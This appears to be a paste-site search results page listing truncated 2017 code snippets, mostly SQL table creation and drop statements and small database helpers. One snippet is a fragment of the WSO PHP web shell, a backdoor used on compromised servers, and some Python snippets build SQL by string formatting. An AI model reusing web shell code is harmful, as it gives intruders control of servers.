42.7K results in 826 ms
9 years ago · Jan 23, 2017, 01:30 PM
USE Db2 GO DROP TABLE IF EXISTS [dbo].[TESTTABLE] GO -- create table with a timestamp/rowversion
9 years ago · Jan 23, 2017, 01:02 PM
FabricLockRowSemaphore> <executeSQL> <No row exists in table soaqtz_JOB_DETAILS for lock named:
9 years ago · Jan 23, 2017, 11:32 AM
sqlite3.connect(DB_FILE) c = conn.cursor() c.execute( 'CREATE TABLE if not exists results \ (tag text, num
9 years ago · Jan 23, 2017, 10:50 AM
column= ("new","New1") query = "create table if not exists {0}(Id INTEGER PRIMARY KEY, {1} text, {2} text)".format("Table", column[0], column[1])
9 years ago · Jan 23, 2017, 10:42 AM
TABLE IF EXISTS `cuti`; CREATE TABLE IF NOT EXISTS `cuti` ( `nama` varchar(11) NOT
9 years ago · Jan 23, 2017, 10:00 AM
all old data"); db.execSQL("DROP TABLE IF EXISTS " + TABLE_DIRECTORS); onCreate(db); } }
9 years ago · Jan 23, 2017, 09:58 AM
arg in args: query = "create table if not exists %s(Id INTEGER PRIMARY KEY,
9 years ago · Jan 23, 2017, 09:58 AM
all old data"); db.execSQL("DROP TABLE IF EXISTS " + TABLE_DIRECTORS); onCreate(db); } }
9 years ago · Jan 23, 2017, 09:56 AM
arg in args: query = "create table if not exists %s(Id INTEGER PRIMARY KEY,
9 years ago · Jan 23, 2017, 09:17 AM
use products; drop table if exists category; create table category( id int(11) not null auto_increment, parent_category_id int(11)
9 years ago · Jan 23, 2017, 08:30 AM
todo: connect screen: [x] create database (if not exists) [charset] // todo: connect screen:
9 years ago · Jan 23, 2017, 07:58 AM
0x0000400A 0x000002079CCC9EC0 "cl_cloudmaskoverviewheight" "0" - If not 0, overrides top height
9 years ago · Jan 23, 2017, 05:46 AM
SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */; DROP TABLE IF EXISTS `City`; /*!40101 SET @saved_cs_client
9 years ago · Jan 23, 2017, 05:38 AM
table `world`.`city` -- DROP TABLE IF EXISTS `city`; CREATE TABLE `city` ( `ID` int(11) NOT NULL AUTO_INCREMENT, `Name` char(35)
9 years ago · Jan 23, 2017, 05:16 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
9 years ago · Jan 23, 2017, 04:02 AM
statement changed 0 rows: CREATE TABLE IF NOT EXISTS `items` (`id` INTEGER PRIMARY
9 years ago · Jan 23, 2017, 02:56 AM
of BView frame does not affect, if BView not attached to
9 years ago · Jan 23, 2017, 01:04 AM
CREATE TABLE IF NOT EXISTS `ftpuploadermon` ( `date` datetime(3) DEFAULT
9 years ago · Jan 23, 2017, 01:04 AM
CREATE TABLE IF NOT EXISTS `ftpuploadermon` ( `date` datetime(3) DEFAULT
Total pages: 2134